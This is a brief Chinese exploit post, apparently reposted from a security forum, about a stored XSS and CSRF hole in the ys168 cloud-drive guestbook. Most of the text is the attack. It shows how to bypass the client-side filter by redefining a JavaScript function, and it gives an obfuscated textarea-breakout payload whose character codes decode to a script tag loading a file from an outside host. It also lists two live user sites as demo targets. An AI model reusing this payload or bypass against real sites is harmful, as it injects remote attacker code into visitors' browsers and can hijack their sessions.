ys168网盘系统留言板存储型xss+csrf - 网站安全 -

留言内容没有服务端过滤。重构zfaq 函数即可。 function zfaq(str) { return str; } 然后本地提交。内容代码为 </textarea><iframe/onload=]javascript:write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,116,109,120,107,46,111,114,103,47,113,46,106,115,62,60,47,115,99,114,105,112,116,62))[> 漏洞证明：演示地址： http://lover.ys168.com/ http://llxc.ys168.com/

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://www.haodehen.cn/did13790

更新时间：2022-09-13 阅读：44次